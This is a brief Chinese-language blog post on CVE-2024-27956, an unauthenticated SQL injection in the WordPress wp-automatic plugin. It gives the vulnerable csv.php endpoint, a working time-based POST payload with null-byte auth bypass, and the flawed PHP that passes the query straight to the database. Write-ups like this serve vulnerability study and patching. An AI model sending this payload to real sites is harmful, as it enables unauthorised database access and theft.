CVE-2024-27956–WordPress-wp-automatic-SQL

最后更新于 2024-05-09 208 次阅读

原文:https://github.com/truonghuuphuc/CVE-2024-27956/
下载存在漏洞版本的安装包 https://github.com/truonghuuphuc/CVE-2024-27956/blob/main/wp-automatic.zip

POC  /wp-content/plugins/wp-automatic/inc/csv.php

POST DATA :q=SELECT+IF(1=1,sleep(5),sleep(0))&auth=%00&integ=93cf9aa11e746596d6f31765a7222c9f

integ后面的值为内容的MD5散列值,可见csv.php文件,

if(wp_automatic_trim($auth == '')){

      echo 'login required';
    exit;
}

if(wp_automatic_trim($auth) != wp_automatic_trim($current_user->user_pass)){
      echo 'invalid login';
    exit;
}

if(md5(wp_automatic_trim($q.$current_user->user_pass)) != $integ ){
      echo 'Tampered query';
    exit;
}


$rows=$wpdb->get_results( $q);
$date=date("F j, Y, g:i a s");
$fname=md5($date);
header("Content-type: application/csv");
header("Content-Disposition: attachment; filename=$fname.csv");
header("Pragma: no-cache");
header("Expires: 0");

  echo "DATE,ACTION,DATA,KEYWORD \n";

没啥难点 根据POC自己看看漏洞代码就搞明白了、至于怎么深入就不讲了自己琢磨吧~